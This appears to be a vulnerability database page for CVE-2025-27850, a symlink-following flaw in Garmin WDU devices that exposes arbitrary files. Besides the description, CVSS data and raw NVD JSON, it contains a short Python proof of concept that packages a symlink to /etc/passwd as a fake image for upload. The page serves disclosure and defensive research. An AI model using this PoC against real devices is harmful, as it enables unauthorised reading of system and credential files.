CVE-2025-27850

Description

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a symlink attack. If a malicious graphics package containing symlinks is uploaded, the web server follows the supplied links when serving content. No mechanisms to restrict those link targets to a specific area of the filesystem is enabled. This allows an attacker to retrieve arbitrary files from the device.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Garmin WDU v1 1.4.6

Garmin WDU v2 5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2025-27850
import os
import zipfile

# 1. Create a symlink pointing to a sensitive file on the Garmin device
target_path = "/etc/passwd" # Example target file
link_name = "exploit.png"
os.symlink(target_path, link_name)

# 2. Package the symlink into a zip file (graphics package)
with zipfile.ZipFile('malicious_package.zip', 'w') as zf:
    zf.write(link_name)

# 3. Upload 'malicious_package.zip' to the Garmin WDU web interface.
# 4. Request the resource via the web URL.
# The server will follow the symlink and return the content of /etc/passwd.
print("Payload created: malicious_package.zip")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27850
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27850
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27850/
[4] VulDB https://vuldb.com/cve/CVE-2025-27850
[5] https://garmin.com
[6] https://www8.garmin.com/support/ch.jsp?product=010-02642-00

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27850", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:41.100", "lastModified": "2026-05-14T17:06:08.693", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a symlink attack. If a malicious graphics package containing symlinks is uploaded, the web server follows the supplied links when serving content. No mechanisms to restrict those link targets to a specific area of the filesystem is enabled. This allows an attacker to retrieve arbitrary files from the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://garmin.com", "source": "[email protected]"}, {"url": "https://www8.garmin.com/support/ch.jsp?product=010-02642-00", "source": "[email protected]"}]}}